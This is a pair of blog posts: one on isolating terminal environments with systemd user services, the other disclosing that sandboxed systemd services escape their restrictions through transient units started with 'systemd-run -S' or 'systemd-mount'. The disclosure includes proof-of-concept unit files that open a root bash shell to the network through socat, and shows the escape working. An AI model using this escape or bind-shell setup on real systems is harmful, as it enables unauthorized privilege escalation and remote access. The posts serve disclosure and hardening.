Isolation for terminal environments

TL;DR

I've tinkered with a solution based on systemd user-services: https://codeberg.org/s1m/termenv. It works as expected but I wish there was a stable solution for this.

For long time, isolations on operating systems has been about isolations between users only. It was accepted that applications of a same user were able to access the same files, and interact with each other. They all have the same rights.

Mobile OS (Android, iOS) has introduced isolation of applications. Two applications can't be trusted the same way, and they don't need to access the same data. Applications are still allowed to interact with each other, only through dedicated interfaces. They have their own storage for their data and their config. If they need to access other directories, the user have to agree to. The applications may use the device settings but, except dedicated applications, they aren't allowed to edit the settings.

As for mobile devices, we need a way to isolate applications on desktop. On Linux, a well known solution is flatpak. Flatpaks are build with a manifest that defines the permissions of the application. They can mount some user directories if they need to read them, access devices, sockets, etc. Portals exist to grant permissions to some resources during runtime. Most graphical applications available on Linux are also distributed with flatpak.

CLI applications and services are usually isolated using containers, and systemd services.

Isolation for terminal environments

In addition to graphical applications, I wish to have different environments on my terminals, isolated from each other. On terminals, per environment isolation is relevant, as we usually use many different applications in a single session.

I need an environment as restricted as possible responsible to update my configs and my user packages. The config and the user packages must be read-only for other environments. And I need to be able to restrict access to directories of other environment if I want to.

It avoids the easy bashrc backdoor, having tens of new hidden directories created with different dev tools, messing with virtual environments and user packages, and so on.

To define my needs:

  • In the environments, the host system must not be modifiable
  • A single environment dedicated to update user packages must be allowed to do it, and everything else must be inaccessible
  • A single environment dedicated to update my config, must be allowed to do it, and everything else must be inaccessible
  • My configs must be readable to all other environments
  • The different environments must be able to override some config/directories, for themselves - this should not include sensitive directories, like the exec directories, the auto-executed scripts, or where the environment is defined.
  • In the environments it must not be possible to trivially escape the sandbox.

Many solutions to get different working environments exist:

  • toolbx, based on podman, allows to run different system with access to the user directories. It doesn't support isolations of the user home and runtime directories out of the box.
  • distribox is similar to toolbx, but I haven't looked into it
  • systemd-homed areas, introduced in v258 but it only provides the ability to change the home directory to get different configs (yet?).

Nothing fit my needs out of the box, so I had to tinker with something. I was previously using something based on toolbx: I used to generate containers to change the home directory and mount read-only some directories.

My current solution

With my recent move to ParticleOS, an experimental image-based distribution with a deep integration of systemd, I've decided to edit my terminal environment scripts to use user managed systemd services.

There are 2 executable scripts: termlaunchmenu that starts a menu to select an environment to run the 2nd scripts, te that applies the configuration of the said environment, and starts my configured command in a transient service.

termlaunchmenu is not very configurable at this moment, and may need to be edited. It's supposed to be started with a system keyboard shortcut, and it depends on wofi.

te is much more configurable. The main config file is located at $HOME/.config/te/conf and it defines the command executed by the transient unit, the different group of directories, and the default inaccessible, read-only and read-writable directories. To avoid the sandbox being trivially escaped, $XDG_RUNTIME_DIR/bus is inaccessible to all the environments.

Then the different environment config are defined in $HOME/.config/te/sessions/env_name. For example, the environment dedicated to update cargo packages is defined as follow:

$HOME/.config/te/sessions/cargo:

NO_PATHS+=( ${DEV_PATHS[@]} ${DOC_PATHS[@]} )
RW_PATHS+=( ${CARGO[@]} )

The source is available on Codeberg: https://codeberg.org/s1m/termenv.

Results

So far, the solution works well. A few things can be improved (like denying access to runtime directories by default, and write an allow-list).

I honestly would prefer to have a stable solution for this. It would be fantastic if systemd-homed areas could be improved to allow to:

  • Restrict access to the system
  • Restrict access to the root home (/home/myuser/) and to the other areas
  • Restrict access to the user and areas runtime directories
  • Bind the content of the root home (inaccessible, RO, or RW)
  • Define group of directories and configure how areas mount them (RO/RW) or not

Sandboxing and sandbox escape with systemd

Today, the most popular Linux service manager is systemd.

Services are defined in units located in defined directories. Package units are in /usr/lib/systemd/system and administrators add their units to /etc/systemd/system. In addition to the system service manager, systemd provides a user service manager, for user services. User units are in other directories, including in the user's home directory.

System and user services can be sandboxed with many different properties, including restrictions on the file system, device access, net interfaces, and so on.

TL;DR

Because (1) with transient units, it's possible to create a new service without writing a configuration file, (2) read-only access to systemd socket doesn't prevent communication with it, and (3) systemd access control relies on polkit only: having a read-only filesystem doesn't prevent the creation of new services with more privileges than the current one.

Access control is based exclusively on polkit, which only works with the system's service and authorizes all calls from root. If you write units, do not run your system unit as root and add ProtectHome=true to your service unit.

Else, the systemd unit sandboxes are trivially escaped. If you really need to run as root, you may deny access to systemd sockets as a workaround. It's not a bug, but it's not explicitly documented.

If you are using another sandbox system, be aware that these sockets can also be used to escape it.

Introduction

As introduced recently, I've recently reinstalled my laptop. In my previous setup, I was using container-based isolations for various shell environments. I had a script to generate new toolbox containers with some isolations, for the home and other directories. No surprise, this time I wanted to switch to a systemd-based isolation. (I will share in another post)

systemd-run is a tool to run services on-demand using transient units, temporary units managed by systemd. It's a useful tool to do some tests, or schedule tasks for example. Every time a new interactive shell is started with systemd-run (systemd-run --user -S), an orange circle is added to the title of the terminal window (🟠 ~). Other systemd features use transient units, like systemd-mount: it starts a temporary unit that mounts a device on the filesystem.

I was using systemd-run to test some sandbox properties (--property ProtectSystem=strict) until my window ended up with 2 circles in its title (🟠🟠 ~).

A few questions then arise: Does systemd control somehow the restrictions of the caller service before starting a transient unit, so a new service can only have additional restrictions (and not lose them)? Does it concerns units managed by the user service manager only or the units managed by the system service manager too? Did I miss something?

Impacted configurations

Transient units are temporary services managed by the service manager. They don't require any config file. So, as soon as we can talk to systemd, it is possible to start new units, even if we don't have write access to the config directories.

It can be more explicit, but the Sandboxing section of the man page of systemd.exec contains a sentence about the ability to talk to systemd on a read-only system:

Note that the various options that turn directories read-only (such as ProtectSystem=, ReadOnlyPaths=, ...) do not affect the ability for programs to connect to and communicate with AF_UNIX sockets in these directories. These options cannot be used to lock down access to IPC services hence.

Polkit is used by systemd to do access control. Polkit is a toolkit to allow unprivileged processes to speak to privileged processes. It allows any call from root to run privileged process, and it isn't used for systemd user service manager (which runs as a user, so isn't privileged).

Given the 3 last points, we can predict 3 possibilities:

  • systemd controls the caller service, and prevents sandboxed services from launching transient units with more privileges than their own
  • systemd controls the caller service, and prevents sandboxed services from launching transient units
  • systemd relies exclusively on polkit for access control, and no other control are performed
[root@archlinux ~]# systemd-run --property DeviceAllow=/dev/vda1 --property ProtectSystem=yes -S
Running as unit: run-p503-i803.service; invocation ID: 4d8fd6bf06534e50b5b478d209c53d7b
Press ^] three times within 1s to disconnect TTY.

[root@archlinux root]# mount /dev/vda2 /mnt
mount: /mnt: fsconfig() failed: /dev/vda2: Can't open blockdev.
       dmesg(1) may have more information after failed mount system call.

[root@archlinux root]# systemd-mount /dev/vda2 /mnt    # Accepted
Started unit mnt.mount for mount point: /mnt

It turns out that systemd relies exclusively on polkit for all access controls. And because polkit isn't used for user units, and because polkit accepts all requests from root, user services and services running as root are able to launch new systemd services with more privileges than their own.

In other words, ProtectSystem=strict alone does not prevent the process from trivially gaining full access to system using systemd, without any sandbox attributes.

If the service runs with another user, but doesn't set ProtectHome=true (implied by DynamicUser=true), or deny access to systemd sockets (InaccessiblePaths=/run/user/<UID>/bus), then the user service manager can be used to start a new service without sandbox attributes.

POC

These tests can be performed with transient units, using systemd-run, but in order to confirm that these tests apply to real units, we can use a unit file that exposes a bash shell to the network with socat.

To illustrate the problem, we can try different configurations with sandboxing options:

  • A system unit running as root
  • A system unit running as a user, the escape works only when the user is connected
  • A user unit

Below are two examples, one for the system unit running as root, the other for the user unit.

System Unit - Root

In this example, the unit is run by the system service manager as root, with 3 sandboxing options: ProtectSystem=strict, ProtectHome=true and InaccessiblePaths=/etc/secret. This unit could be used to sandbox a service that requires certain privileges.

This is a common sandbox configuration.

[Unit]
Description=POC
After=network-online.target

[Service]
Type=simple
UMask=0007
ProtectSystem=strict
ProtectHome=true
InaccessiblePaths=/etc/secret

ExecStart=/sbin/socat tcp-l:8888,fork,reuseaddr exec:'bash -li',pty,stderr,setsid,sigint,sane
KillSignal=SIGINT

Restart=on-failure
TimeoutStopSec=5

[Install]
WantedBy=multi-user.target

The service can escape the sandbox with systemd-run -S: we can see that the process is correctly sandboxed at first: /etc/secret is not accessible. But it is writable after starting a new, unrestricted service with systemd-run.

~> socat stdin tcp:localhost:8888
2025/02/24 16:05:18 socat[134374] W address is opened in read-write mode but only supports read-only
[root@poc /]# cat /etc/secret/poc
cat: /etc/secret/poc: No such file or directory

[root@poc /]# systemd-run -S
Running as unit: run-p4123-i134849.service
Press ^] three times within 1s to disconnect TTY.
[root@poc /]# cat /etc/secret/poc
poc

User Unit

In this example, the unit is run by the user service manager, with a sandboxing option: ProtectHome=read-only. This unit could be used to have a user service, that is expected to read data from the home directory.

[Unit]
Description=POC
After=network-online.target

[Service]
Type=simple
ProtectHome=read-only

ExecStart=/sbin/socat tcp-l:8888,fork,reuseaddr exec:'bash -li',pty,stderr,setsid,sigint,sane
KillSignal=SIGINT

Restart=on-failure
TimeoutStopSec=5

[Install]
WantedBy=multi-user.target

The service can escape the sandbox with systemd-run --user -S: we can see that the process is correctly sandboxed at first: $HOME is not accessible. But it is writable after starting a new, unrestricted service with systemd-run.

~> socat stdin tcp:localhost:8888
2025/02/24 11:36:04 socat[46527] W address is opened in read-write mode but only supports read-only
[poc@poc ~]$ touch a
touch: cannot touch 'a': Read-only file system

[poc@poc ~]$ systemd-run --user -S
Running as unit: run-p5131-i46889.service
Press ^] three times within 1s to disconnect TTY.

[poc@poc ~]$ touch a
[poc@poc ~]$ ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos  a

Escaping a system unit running as a user will work the same way if / when the user is connected.

Conclusion

If you look at your own system, you'll find many service units running as root with ProtectSystem=yes|strict|true. The possibility of starting arbitrary, non-sandboxed services on a read-only file system doesn't seem to be widely known.

If you do some security tests and gain access to a sandboxed service, try systemd-run [--user] -S. You'll probably get more privileges.

If you're writing your own unit files, don't run your service as root and use ProtectHome=true or be very careful if you don't. If you must run as root, deny access to most of /run, and at least to /run/dbus/system_bus_socket.

I think systemd should define the ability to run unrestricted transient units behind a property. This capability should be enabled by default unless certain sandbox attributes are declared. Then, if the capability is not given, systemd could either apply the caller context to the transient unit, or deny transient units.

I opened a pull request (which may need some improvments) to systemd to apply caller context to the transient units if the ability to execute an unrestricted transient unit is not given. It was closed without any form of review because that's how it works by design. By design you can use systemd-mount to mount an unauthorized device.

At least, it might be a good idea to clarify this behavior in the documentation.